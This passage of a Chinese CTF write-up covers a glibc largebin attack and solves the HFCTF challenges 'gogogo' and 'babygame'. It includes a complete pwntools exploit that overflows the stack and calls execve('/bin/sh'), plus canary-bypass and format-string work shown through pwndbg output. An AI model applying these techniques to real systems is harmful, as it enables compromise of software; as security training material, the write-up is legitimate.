00:0000│ rsp 0x7fffffffdf10 —▸ 0x55555555a8a0 ◂— 0x0 // stack_var1
01:00080x7fffffffdf18 —▸ 0x55555555a8a0 ◂— 0x0 // stack_var2
1
2
stack_var1 (0x7fffffffdf10): 0x55555555a8a0
stack_var2 (0x7fffffffdf18): 0x55555555a8a0

成功在“stack_var1”和“stack_var2”中写入了“p3”的地址,这就是利用了以下代码:

1
2
victim->bk_nextsize->fd_nextsize = victim;
bck->fd = victim; /* bck 也就是 fwd->bk */

在“p2”覆盖完毕后,再次申请内存空间的过程中:

  • p3会被写入largebin,它的结构如下:
1
2
3
4
5
6
pwndbg> x/20xg 0x55555555b8a0
0x55555555b8a0: 0x0000000000000000 0x0000000000000511
0x55555555b8b0: 0x000055555555b360 0x00007fffffffdf00
/* FD = p2 BK = stack_var1-2 */
0x55555555b8c0: 0x000055555555b360 0x00007fffffffdef8
/* fd_nextsize = p2 bk_nextsize = stack_var2-4 */
  • 在前面操作中,p2的size被修改,使得p3成为新的纵向列表头
  • 因为 “p3->size” 大于 “p2->size”,所以p3将插入p2前面
  • 下面的代码都是将解释p3进入largebin后的结构:
1
2
3
4
5
6
7
8
9
10
11
fwd = bck /* fwd初始化为原链表头 */
fwd = fwd->fd_nextsize /* 遍历链表寻找合适的fwd,最后找到fwd=p2(p2已经被伪造) */
/* fwd = p2 */

bck = fwd->bk /* 这里的fwd就是p2,而fwd->bk则是"stack_var1-2" */
/* bck = stack_var1-2 */

victim->bk = bck /* bk = stack_var1 - 2 */
victim->fd = fwd /* fd = p2 */
victim->bk_nextsize = fwd->bk_nextsize /* bk_nextsize = stack_var2 - 4 */
victim->fd_nextsize = fwd /* fd_nextsize = p2 */
  • 最后解释一下“stack_var1”和“stack_var2”被修改的原因:
1
2
3
4
5
6
7
/* fwd = p2 */
/* bck = stack_var1-2 */

fwd->bk_nextsize = victim /* p2->bk_nextsize=victim */
victim->bk_nextsize->fd_nextsize = victim /* (stack_var2-4)->fd_nextsize=victim */
fwd->bk = victim /* p2->bk=victim */
bck->fd = victim /* (stack_var1-2)->fd=victim */
1
2
3
4
5
6
7
01:00080x7fffffffdef8 ◂— 0x0 // stack_var2-4
02:0010│ r8 0x7fffffffdf00 —▸ 0x7fffffffdf40 —▸ 0x555555555330 (__libc_csu_init) ◂— endbr64 // stack_var1-2
03:00180x7fffffffdf08 —▸ 0x5555555552c6 (main+316) ◂— mov rax, qword ptr [rbp - 0x30]
04:0020│ rsp 0x7fffffffdf10 —▸ 0x55555555b8a0 ◂— 0x0 // stack_var1
05:00280x7fffffffdf18 —▸ 0x55555555b8a0 ◂— 0x0 // stack_var2
/* (stack_var2-4)->fd_nextsize=stack_var2 */
/* (stack_var1-2)->fd=stack_var1 */
1
2
3
4
pwndbg> x/20xg 0x55555555b360 /* p2 */
0x55555555b360: 0x0000000000000000 0x00000000000003f1
0x55555555b370: 0x0000000000000000 0x000055555555b8a0 // p3
0x55555555b380: 0x0000000000000000 0x000055555555b8a0 // p3

libc-2.30 的检测

1
2
if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");

在 glibc2.29 中,增加了对双向链表完整性的检查,这样的检查方式正如同 glibc2.29 中增加的对 unsorted bin 类似,但是与其不同的是,这个检查只存在于插入的 unsorted chunk size 大于 chunk 时候,也就是说, 如果我们构造一个小于所有 largebin 中堆块的 unsorted chunk,那么就可以成功利用上面那个分支操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
if ((unsigned long)(size)
< (unsigned long)chunksize_nomask(bck->bk))
{
fwd = bck;
bck = bck->bk;
victim->fd_nextsize = fwd->fd;
victim->bk_nextsize = fwd->fd->bk_nextsize;
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
}
else
{
assert(chunk_main_arena(fwd));
while ((unsigned long)size < chunksize_nomask(fwd))
{
fwd = fwd->fd_nextsize;
assert(chunk_main_arena(fwd));
}
if ((unsigned long)size
== (unsigned long)chunksize_nomask(fwd))
/* Always insert in the second position. */
fwd = fwd->fd;
else
{
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
if (__glibc_unlikely(fwd->bk_nextsize->fd_nextsize != fwd))
malloc_printerr("malloc(): largebin double linked list corrupted (nextsize)");
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
if (bck->fd != fwd)
malloc_printerr("malloc(): largebin double linked list corrupted (bk)");
}

gogogo

1
2
3
➜  [/home/ywhkkx/桌面] ./gogogo       
LET'S BEGIN TO PLAY A GUESS GAME IN HFCTF!
PLEASE INPUT A NUMBER:
1
2
3
4
5
6
7
8
gogogo: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=OPIhFHMrY-7UFXwK1kut/ps8Q_hGCHEf-Am9x5tdv/3tThvdTnrIvrW8jtkHHX/yCVwqchmGGNZd485XtOR, stripped

[*] '/home/ywhkkx/桌面/gogogo'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)

输入两个数字,进入主体程序:

1
2
3
➜  桌面 ./gogogo 
LET'S BEGIN TO PLAY A GUESS GAME IN HFCTF!
PLEASE INPUT A NUMBER:

golang逆向出来真的难看:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
void __cdecl main_main()
{
__int64 v0; // r14
_QWORD *v1; // rax
__int64 v2; // [rsp-38h] [rbp-98h]
__int64 v3; // [rsp-38h] [rbp-98h]
__int64 v4; // [rsp-38h] [rbp-98h]
__int64 v5; // [rsp-38h] [rbp-98h]
__int64 v6; // [rsp-38h] [rbp-98h]
__int64 v7; // [rsp-38h] [rbp-98h]
__int64 v8; // [rsp-38h] [rbp-98h]
_QWORD *v9; // [rsp+0h] [rbp-60h]
_QWORD v10[2]; // [rsp+48h] [rbp-18h] BYREF

while ( (unsigned __int64)v10 <= *(_QWORD *)(v0 + 16) )
runtime_morestack_noctxt();
v10[0] = &unk_49D7C0;
v10[1] = &off_4CFBB0;
fmt_Fprintln(v2);
fmt_Fprintln(v3);
runtime_newobject(v4);
v9 = v1;
fmt_Fscanf(v5);
if ( *v9 == 305419896LL )
{
fmt_Fprintln(v6);
runtime_makeslice(v7);
bufio___ptr_Reader__Read(v8);
}
else
{
fmt_Fprintln(v6);
}
}

利用插件初步处理后:(我用的是 IDAGolangHelper)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
void __cdecl main_main()
{
__int64 v0; // r14
_QWORD *v1; // rax
_QWORD *v2; // [rsp+0h] [rbp-60h]
_QWORD v3[2]; // [rsp+48h] [rbp-18h] BYREF

while ( (unsigned __int64)v3 <= *(_QWORD *)(v0 + 16) )
runtime_morestack_noctxt();
v3[0] = &unk_49D7C0;
v3[1] = &off_4CFBB0;
fmt_Fprintln();
fmt_Fprintln();
runtime_newobject();
/* Go 语言的标准库函数runtime.newobject()用于在heap上的内存分配和代理runtime.mallocgc */
v2 = v1;
fmt_Fscanf();
if ( *v2 == 305419896LL )
/* fmt_Fscanf()应该是输入语句,v2应该是输入的内容 */
{
fmt_Fprintln();
runtime_makeslice();
bufio__ptr_Reader_Read();
/* Reset丢弃缓冲中的数据,清除任何错误,将b重设为其下层从r读取数据 */
}
else
{
fmt_Fprintln();
}
}

程序提示我们输入一个数字,那么就输入“305419896”

1
2
3
4
5
➜  桌面 ./gogogo 
LET'S BEGIN TO PLAY A GUESS GAME IN HFCTF!
PLEASE INPUT A NUMBER:
305419896
OKAY YOU CAN LEAVE YOUR NAME AND BYE~

好像失败了,这是这么回事(不输入这个数字会直接退出)另外我还发现:

  • main_main 中下的断点丝毫不起作用
  • IDA的伪代码中有许多 fmt_Fprintf() ,每个只输出一个字符
  • 其中 fmt_Fprintln() 表示输出带有“\n”的字符串

golang 会通过 runtime·newproc 创建 runtime.main 协程,然后在 runtime.main 里会启动 main.main 函数,这个就是我们平时写的那个 main 函数了

因为我对 golang 的底层不熟悉,所以我选择在 runtime.main 处打断点,一步一步分析程序的流程

  • 结果程序在 math_init 中不断循环,调试不了(IDA在一步步单步执行后,又回到了原点,目前不知道为什么)
  • 最后通过下断点的方式跳出了循环,并且成功发现了目标数据
1
2
3
4
5
6
7
8
9
10
11
12
13
14
if ( v2 == 1717986918 )
{
bytes_In(); /* 盲猜是输入 */
}
else if ( v2 != 1416925456 )
{
fmt_Fprintf();
fmt_Fprintf();
fmt_Fprintf();
v139 = &unk_49D7C0;
v140 = &off_4CFC10;
fmt_Fprintln();
return;
}
  • 第一次输入:1717986918
  • 第二次输入:1416925456
1
2
3
4
5
6
7
8
9
10
11
12
➜  桌面 ./gogogo        
LET'S BEGIN TO PLAY A GUESS GAME IN HFCTF!
PLEASE INPUT A NUMBER:
1717986918
LET'S BEGIN TO PLAY A GUESS GAME IN HFCTF!
PLEASE INPUT A NUMBER:
1416925456
BYE~


NOW WE BEGIN A BULLS AND COWS GAME
YOU HAVE SEVEN CHANCES TO GUESS // 7次机会

进入下一阶段了,通过调试获取目标代码,下面一段大概就是了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
v138 = &unk_49D7C0;
v139 = &unk_4CFC00;
v3 = qword_551500;
fmt_Fprintln();
while ( 2 )
{
v150 = time_Now();
/* 获取当前时间 */
v151 = v3;
v152 = v4;
math_rand__ptr_Rand_Seed();
/* 获取随机数种子 */
math_rand__ptr_Rand_Intn();
/* 输出随机数 */
v67[0] = v5;
math_rand__ptr_Rand_Intn();
while ( v67[0] == v6 )
math_rand__ptr_Rand_Intn();
v74 = v6;
math_rand__ptr_Rand_Intn();
v8 = v67[0];
for ( i = v74; v8 == v7 || v7 == i; i = v74 )
{
math_rand__ptr_Rand_Intn();
v8 = v67[0];
}
v73 = v7;
math_rand__ptr_Rand_Intn();
v11 = v67[0];
v12 = v74;
for ( j = v73; v11 == v10 || v10 == v12 || v10 == j; j = v73 )
{
math_rand__ptr_Rand_Intn();
v11 = v67[0];
v12 = v74;
}
v71 = v10;

很难看,但大体上了解了:这是通过“系统时间”来获取随机数,最后的输入在这里:

1
2
3
4
5
6
7
8
9
10
11
12
fmt_Fscanf();
v26 = *v85;
if ( v67[0] != *v85 ) /* 盲猜v67[0]为随机数,v85就是输入值 */
{
v29 = v73;
v32 = v82;
v31 = v83;
v27 = v74;
v28 = v84;
v30 = v71;
goto LABEL_44;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
LABEL_44:
v33 = *v28;
v34 = *v31;
v35 = *v32;
v36 = v67[0] == *v28 || v67[0] == v34 || v67[0] == v35;
if ( v27 == v26 || v27 == v34 || v27 == v35 )
++v36;
if ( v29 == v33 || v29 == v26 || v29 == v35 )
++v36;
if ( v30 == v26 || v30 == v34 || v30 == v33 )
++v36;
v67[1] = v36;
runtime_convT64(v64);
v80 = v24;
runtime_convT64(v65);
v153 = "\b";
v154 = v80;
v155 = "\b";
v156 = v25;
fmt_Fprintf();
v124 = &unk_49D7C0;
v125 = &unk_4CFC00;
v3 = qword_551500;
fmt_Fprintln();
v18 = v72 + 1;
v17 = v82;

单步调试,没有看明白它的代码,但是它给出了提示:

1
2
3
4
5
6
NOW WE BEGIN A BULLS AND COWS GAME
YOU HAVE SEVEN CHANCES TO GUESS
$ 6
0A1B
$ 999
0A0B

0A1B?0A0B?盲猜这是程序的某种提示,组里和我同期的pwn手发现这是“1A2B游戏”

1
2
3
4
5
6
你和对手分别选定一个四位数,各位数字不要重复
游戏开始后,由双方分别猜对方所选定的四位数,猜测的结果将会列在自己的猜测历史列表,并以A和B来表示结果
A代表猜测的数字中,数字相同且位置也正确的个数
B代表猜测的数字中,数字相同但位置不一样的个数
举例来说,如果对方的数字为1234,且你猜的数字为5283,其中2被猜到且位置正确,3也被猜到但位置不对,所以结果会出现1A1B
比赛由先完整猜出对方数字的人获得胜利(也就是先得到4A的玩家)

在我的后续尝试中发现,输入的数字需要加空格:

1
2
3
4
5
6
NOW WE BEGIN A BULLS AND COWS GAME
YOU HAVE SEVEN CHANCES TO GUESS
$ 1234
1A1B
$ 5678
1A1B /* 很明显不符合规则 */
1
2
3
4
5
6
NOW WE BEGIN A BULLS AND COWS GAME
YOU HAVE SEVEN CHANCES TO GUESS
$ 1 2 3 4
1A0B
$ 5 6 7 8
0A2B /* 现在差不多了 */

接下来就是算法的问题了,我想通过爆破所有可能性来“猜中”随机数,但是在这个过程中遇到了许多BUG,花费了我很多时间才成功,下面就是攻击脚本:(有点丑陋,但很直观)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
A=0
B=0
C=0
D=0
E=0

p.recvuntil('YOU HAVE SEVEN CHANCES TO GUESS\n')
while(True):
E=E+1

payload=str(A)+' '+str(B)+' '+str(C)+' '+str(D)
p.sendline(payload)
sleep(0.001) # 这里必须要sleep一小会,不然就会发生错误
success("now is :"+str(A)+' '+str(B)+' '+str(C)+' '+str(D))

recv = p.recv(5)
if recv[0]=='Y':
success("find it")
p.sendline("e")
break

a = eval(recv[0])
b = eval(recv[2])

success("A="+str(a)+","+"B="+str(b))
D=D+1
if D==10:
D=0
C=C+1
if C==10:
C=0
B=B+1
if B==10:
B=0
A=A+1

if a==3:
success("close.......")

if E==7:
E=0
p.recvuntil('TRY AGAIN?\n')
p.sendline("a")
p.recvuntil('YOU HAVE SEVEN CHANCES TO GUESS\n')

接下来就进入这里了:(看上去像堆题)

1
2
3
4
5
6
7
I THINK I SHOULD USE ANOTHER FAMILIAR THING TO KEEP YOU!!!!
YOU HAVE FIVE CHOICE:
(0) INPUT
(1) OUTPUT
(2) EDIT
(3) CLEAR
(4) EXIT

那个和我同期的兄弟发现了栈溢出,我想也没有更好的办法了(毕竟对golang的heap不熟悉)

选择“4”后,有一次输入的机会,不管输入什么都会触发“exit”,这也是最后的机会了,这里先直接挂代码把:

1
2
3
4
5
6
7
p.recvuntil('(4) EXIT\n')
p.sendline('4')
_syscall_Syscall = 0x47CF05
binsh = 0xc0000aa000
payload = b'/bin/sh\x00'*0x8c + p64(_syscall_Syscall) + p64(0) + p64(59) + p64(binsh) + p64(0) + p64(0)
p.recvuntil('ARE YOU SURE?\n')
p.send(payload)

假设输入只输入0x8c个“/bin/sh\x00”:

1
2
3
4
5
6
7
8
9
10
0x45c849    syscall  <SYS_exit_group>
rdi: 0x0
rsi: 0x0
rdx: 0x0
r10: 0x1
0x45c84b ret

0x45c84c int3
0x45c84d int3
0x45c84e int3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
pwndbg> search -s /bin/sh
[anon_c000000] 0xc000045b18 0x68732f6e69622f /* '/bin/sh' */
[anon_c000000] 0xc000045b20 0x68732f6e69622f /* '/bin/sh' */
[anon_c000000] 0xc000045b28 0x68732f6e69622f /* '/bin/sh' */
[anon_c000000] 0xc000045b30 0x68732f6e69622f /* '/bin/sh' */
........
[anon_c000000] 0xc00007c430 0x68732f6e69622f /* '/bin/sh' */
[anon_c000000] 0xc00007c438 0x68732f6e69622f /* '/bin/sh' */
[anon_c000000] 0xc00007c440 0x68732f6e69622f /* '/bin/sh' */
[anon_c000000] 0xc00007c448 0x68732f6e69622f /* '/bin/sh' */
[anon_c000000] 0xc00007c450 0x68732f6e69622f /* '/bin/sh' */
[anon_c000000] 0xc00007c458 0x68732f6e69622f /* '/bin/sh' */
pwndbg> stack 50
00:0000│ rsp 0xc000045f78 —▸ 0x43217c ◂— xorps xmm15, xmm15 /* 栈顶 */

可以发现:当前的栈顶(“ret”即将控制的区域)是可以控制的,直接在此写入“_syscall_Syscall”便可以控制IP指针并且进行系统调用

1
2
#define __NR_execve 59
/* "0"用于覆盖"_syscall_Syscall"的返回地址,"59"是execve的调用号,剩下的都是参数 */

完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
from pwn import *

p=process('./gogogo')
elf=ELF('./gogogo')

p.recvuntil('PLEASE INPUT A NUMBER:\n')
p.sendline(str(1717986918))
p.recvuntil('PLEASE INPUT A NUMBER:\n')
p.sendline(str(1416925456))

A=0
B=0
C=0
D=0
E=0

p.recvuntil('YOU HAVE SEVEN CHANCES TO GUESS\n')
while(True):
E=E+1

payload=str(A)+' '+str(B)+' '+str(C)+' '+str(D)
p.sendline(payload)
sleep(0.001)
success("now is :"+str(A)+' '+str(B)+' '+str(C)+' '+str(D))

recv = p.recv(5)
if recv[0]=='Y':
success("find it")
p.sendline("e")
break

a = eval(recv[0])
b = eval(recv[2])

success("A="+str(a)+","+"B="+str(b))
D=D+1
if D==10:
D=0
C=C+1
if C==10:
C=0
B=B+1
if B==10:
B=0
A=A+1

if a==3:
success("close.......")

if E==7:
E=0
p.recvuntil('TRY AGAIN?\n')
p.sendline("a")
p.recvuntil('YOU HAVE SEVEN CHANCES TO GUESS\n')

#gdb.attach(p,"b*0x45c849")

p.recvuntil('(4) EXIT\n')
p.sendline('4')
_syscall_Syscall = 0x47CF05
binsh = 0xc0000aa000
payload = b'/bin/sh\x00'*0x8c + p64(_syscall_Syscall) + p64(0) + p64(59) + p64(binsh) + p64(0) + p64(0)
p.recvuntil('ARE YOU SURE?\n')
p.send(payload)

p.interactive()

小结

这个 GO 还是有点折磨的,在没有用插件的情况下,IDA上全是乱码(函数未重命名)很难识别,用了插件后,才勉强可以在网上搜索相关函数的信息

本题目很考验逆向基础,没有大型的加密解密,但IDA上的混淆还是很难受的

最后说一下我在复现过程中遇到的困难:

  • GO本身的乱码(这个用插件可以解决大部分)
  • 对于GO入口地址的探索:我刚开始以为GO的入口地址是 main_main ,发现断点不起作用后就无计可施了,最后我把几个和main有关的函数( main_initruntime_main )都打上断点,调试出了入口地址
  • 绕过“1A2B游戏”:这个是最花时间的了,我光是看懂它的机制就耗了不少时间,期初我还在和搞算法的室友讨论怎么在7次之内求解,后来我发现随机数是不变的于是果断爆破,这个脚本我也弄了很久(有时候会有莫名其妙的错误导致爆破失败,最后加上sleep才解决了问题)
  • ret劫持的调试工作:这个就有点憋屈了,因为执行 exit 的时候程序会把我的 GDB 给掐掉,让我看不见栈上的数据,最后还是靠单步调试在执行 exit 前打断点,终于观察到了栈地址(似乎GO没有栈地址随机化)

逆向能力对于pwn手来说真的很重要,以后也要多多训练逆向能力了…

babygame

刚开始拿到的文件其实是个压缩包,改后缀解压一下就好了

1
2
3
4
5
6
7
8
9
10
11
➜  桌面 ./babygame 
Welcome to HFCTF!
Please input your name:
ywx
Hello, ywx

Let's start to play a game!
0. rock
1. scissor
2. paper
round 1:
1
2
3
4
5
6
7
8
babygame: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=50007d900d58090aa96310390fcebd6350df9f31, for GNU/Linux 3.2.0, stripped

[*] '/home/yhellow/\xe6\xa1\x8c\xe9\x9d\xa2/babygame'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled

64位,dynamically,全开

1
GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.7) stable release versi

漏洞分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
char name[256]; // [rsp+0h] [rbp-120h] BYREF
unsigned int seed; // [rsp+100h] [rbp-20h]
int v6; // [rsp+104h] [rbp-1Ch]
unsigned __int64 v7; // [rsp+108h] [rbp-18h]

v7 = __readfsqword(0x28u);
((void (__fastcall *)())((char *)&init_s + 1))();
seed = time(0LL);
puts("Welcome to HFCTF!");
puts("Please input your name:");
read(0, name, 0x256uLL); // 栈溢出
printf("Hello, %s\n", name);
srand(seed); // 初始化种子
v6 = game(); // 1/3 的概率返回 1
if ( v6 > 0 )
pwn();
return 0LL;
}
1
2
3
4
5
6
7
8
9
10
11
unsigned __int64 pwn()
{
char buf[264]; // [rsp+0h] [rbp-110h] BYREF
unsigned __int64 canary; // [rsp+108h] [rbp-8h]

canary = __readfsqword(0x28u);
puts("Good luck to you.");
read(0, buf, 0x100uLL);
printf(buf); // 格式化漏洞
return __readfsqword(0x28u) ^ canary;
}

格式化字符串漏洞,好久都没有遇到了

入侵思路

有栈溢出,可以用来泄露“pro_base”

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
pwndbg> stack 50
00:0000│ rsp 0x7ffe86861e08 —▸ 0x558b6a2142e3 ◂— lea rax, [rbp - 0x30]
01:0008│ rsi 0x7ffe86861e10 ◂— 0x0
... ↓ 3 skipped
05:00280x7ffe86861e30 —▸ 0x558b6a214180 ◂— endbr64
06:00300x7ffe86861e38 ◂— 0x65ed34df67df5f00
07:0038│ rbp 0x7ffe86861e40 —▸ 0x7ffe86861e60 —▸ 0x7ffe86861f90 ◂— 0x0
08:00400x7ffe86861e48 —▸ 0x558b6a2143a6 ◂— mov dword ptr [rbp - 4], eax
09:00480x7ffe86861e50 ◂— 0x6a214180
0a:00500x7ffe86861e58 ◂— 0x7fef00000002
0b:00580x7ffe86861e60 —▸ 0x7ffe86861f90 ◂— 0x0
0c:00600x7ffe86861e68 —▸ 0x558b6a214524 ◂— mov dword ptr [rbx], eax
0d:00680x7ffe86861e70 ◂— 'aaaaaaaa\n\t' // input 'a'*8
0e:00700x7ffe86861e78 ◂— 0x9800000090a /* '\n\t' */
0f:00780x7ffe86861e80 ◂— 0x98000000980
... ↓ 9 skipped
19:00c8│ 0x7ffe86861ed0 ◂— 0x0
1a:00d0│ 0x7ffe86861ed8 ◂— 0x100
1b:00d8│ 0x7ffe86861ee0 ◂— 0x4000000000
1c:00e00x7ffe86861ee8 ◂— 0x40000000200
1d:00e80x7ffe86861ef0 ◂— 0x0
... ↓ 7 skipped
25:01280x7ffe86861f30 —▸ 0x558b6a213040 ◂— 0x400000006
26:01300x7ffe86861f38 ◂— 0xf0
27:01380x7ffe86861f40 ◂— 0xc2
28:01400x7ffe86861f48 —▸ 0x7ffe86861f77 ◂— 0xed34df67df5f0000
/* 其实这里也可以leak stack_addr,但是为了覆盖seed就不能泄露这里了 */
29:01480x7ffe86861f50 —▸ 0x7ffe86861f76 ◂— 0x34df67df5f000000
2a:01500x7ffe86861f58 —▸ 0x558b6a2145bd ◂— add rbx, 1 // leak pro_base
2b:01580x7ffe86861f60 —▸ 0x7fefa87172e8 (__exit_funcs_lock) ◂— 0x0
2c:01600x7ffe86861f68 —▸ 0x558b6a214570 ◂— endbr64
2d:0168│ rbx-4 0x7ffe86861f70 ◂— 0x62381e44 // canary
2e:01700x7ffe86861f78 ◂— 0x65ed34df67df5f00 // canary
2f:01780x7ffe86861f80 —▸ 0x7ffe86862080 ◂— 0x1 // leak stack_addr
30:01800x7ffe86861f88 —▸ 0x558b6a214570 ◂— endbr64
31:01880x7ffe86861f90 ◂— 0x0
pwndbg>
32:01900x7ffe86861f98 —▸ 0x7fefa854a0b3 (__libc_start_main+243) ◂— mov edi, eax // leak libc_base
33:01980x7ffe86861fa0 —▸ 0x7fefa8747620 (_rtld_global_ro) ◂— 0x50d1300000000
34:01a0│ 0x7ffe86861fa8 —▸ 0x7ffe86862088 —▸ 0x7ffe86863393 ◂— './babygame'
35:01a8│ 0x7ffe86861fb0 ◂— 0x100000000
36:01b0│ 0x7ffe86861fb8 —▸ 0x558b6a214465 ◂— endbr64
37:01b8│ 0x7ffe86861fc0 —▸ 0x558b6a214570 ◂— endbr64
38:01c0│ 0x7ffe86861fc8 ◂— 0x70fd944c7d5b3327
39:01c8│ 0x7ffe86861fd0 —▸ 0x558b6a214180 ◂— endbr64
3a:01d0│ 0x7ffe86861fd8 —▸ 0x7ffe86862080 ◂— 0x1
3b:01d8│ 0x7ffe86861fe0 ◂— 0x0
3c:01e00x7ffe86861fe8 ◂— 0x0
3d:01e80x7ffe86861ff0 ◂— 0x8f009940421b3327
3e:01f0│ 0x7ffe86861ff8 ◂— 0x8f22c4e53d953327
3f:01f8│ 0x7ffe86862000 ◂— 0x0
... ↓ 2 skipped
1
2
3
4
5
6
pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
0x558b6a213000 0x558b6a214000 r--p 1000 0
/home/yhellow/桌面/babygame
0x7fefa8526000 0x7fefa8548000 r--p 22000 0
/home/yhellow/tools/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/libc-2.31.so

因为开了PIE,所以我首先想到要 leak pro_base

1
2
3
4
5
6
7
8
9
10
11
12
13
p.recvuntil('Please input your name:')

payload='a'*232
p.sendline(payload)

p.recvuntil('Hello')
p.recvuntil('\n')

leak_addr=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
leak_addr=eval(hex(leak_addr)+'0'*2) # 末尾打印不出来
pro_base=leak_addr-5376
success('leak_addr >> '+hex(leak_addr))
success('pro_base >> '+hex(pro_base))

接下来要破解“game”,我最初的想法是:循环输入“1”直到打通为止,但伪随机数表中根本不可能出现这种情况,所以我打算也引入随机操作,只要种子合适,就有可能成功

1
2
char name[256]; // [rsp+0h] [rbp-120h] BYREF
unsigned int seed; // [rsp+100h] [rbp-20h]

其实 seed 是可以被覆盖的,但是我为了 leak pro_base 放弃了覆盖 seed,为了可以覆盖 seed ,就必须先获得 leak canary

当时就卡在了这里,后面可以 leak stack_addr 的数据都被 canary 保护,即使通过了“game”,在开了PIE的情况下也无法利用格式化漏洞

通过“game”的脚本:

1
2
3
4
5
6
seed=key.srand(0x31313131)

for i in range(100):
p.recvuntil('round '+ str(i+1)+ ': \n')
num=(key.rand()+1)%3
p.sendline(str(num))

在学习了我们组里一位大佬的 wp 后,我感觉很奇怪, canary明明被覆盖了却没有立刻报错,后续的利用依然可以正常执行 ,基于这点就可以 leak stack_addr了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
p.recvuntil('Please input your name:')
payload='a'*256+'1'*4+'a'*12
p.send(payload)
p.recvuntil('1'*4+'a'*12)
leak_addr=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
stack_addr=leak_addr-528
success('leak_addr >> '+hex(leak_addr))
success('stack_addr >> '+hex(stack_addr))
seed=key.srand(0x31313131)

for i in range(100):
p.recvuntil('round '+ str(i+1)+ ': \n')
num=(key.rand()+1)%3
p.sendline(str(num))

这样可以把rbp泄露出来,通过rbp来计算 stack_addr(这里不选择 leak stack_base,通过rbp计算出的stack_base不准确,stack_addr 就是 read 写入的栈地址)

下一步就是利用格式化漏洞来构造循环(因为我们肯定会多次执行程序)

1
2
3
0x557a74bd3449    call   printf@plt                <printf@plt>
format: 0x7ffee08a7670 ◂— 0x252d70252d70252d ('-%p-%p-%')
vararg: 0x7ffee08a7670 ◂— 0x252d70252d70252d ('-%p-%p-%')

初步定位格式化参数的位置(输入20个“-%p”):

1
2
Good luck to you.
-0x7ffee08a7670-0x100-0x7f82e8359002-0x12-(nil)-0x252d70252d70252d-0x2d70252d70252d70-0x70252d70252d7025-0x252d70252d70252d-0x2d70252d70252d70-0x70252d70252d7025-0x252d70252d70252d-0x2d70252d70252d70-0x70252d70252d7025-0x252d70252d70252d-0x2d70252d70252d70-0x70252d70252d7025-0x99059999-0xffffffffffffffff-0xd68-0x7ffee08a7894-0x7ffee08a7760-0x557a74bd3180-0x7ffee08a79a0-(nil)-(nil)-0x7f82e828f5f4-0x8-0x557a74bd32ef-0xa32-(nil)-(nil)\x99\x99\x05*** stack smashing detected ***: terminated
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
pwndbg> stack 50
00:0000│ rdi rsi rsp 0x7ffee08a7670 ◂— 0x252d70252d70252d ('-%p-%p-%')
01:00080x7ffee08a7678 ◂— 0x2d70252d70252d70 ('p-%p-%p-')
02:00100x7ffee08a7680 ◂— 0x70252d70252d7025 ('%p-%p-%p')
03:00180x7ffee08a7688 ◂— 0x252d70252d70252d ('-%p-%p-%')
04:00200x7ffee08a7690 ◂— 0x2d70252d70252d70 ('p-%p-%p-')
05:00280x7ffee08a7698 ◂— 0x70252d70252d7025 ('%p-%p-%p')
06:00300x7ffee08a76a0 ◂— 0x252d70252d70252d ('-%p-%p-%')
07:00380x7ffee08a76a8 ◂— 0x2d70252d70252d70 ('p-%p-%p-')
08:00400x7ffee08a76b0 ◂— 0x70252d70252d7025 ('%p-%p-%p')
09:00480x7ffee08a76b8 ◂— 0x252d70252d70252d ('-%p-%p-%')
0a:00500x7ffee08a76c0 ◂— 0x2d70252d70252d70 ('p-%p-%p-')
0b:00580x7ffee08a76c8 ◂— 0x70252d70252d7025 ('%p-%p-%p')
0c:00600x7ffee08a76d0 ◂— 0x99059999 /* No.18 */
0d:00680x7ffee08a76d8 ◂— 0xffffffffffffffff
0e:00700x7ffee08a76e0 ◂— 0xd68
0f:00780x7ffee08a76e8 —▸ 0x7ffee08a7894 ◂— 0x6161616100000001
10:00800x7ffee08a76f0 —▸ 0x7ffee08a7760 —▸ 0x7ffee08a7780 —▸ 0x7ffee08a78b0 ◂— 0x0
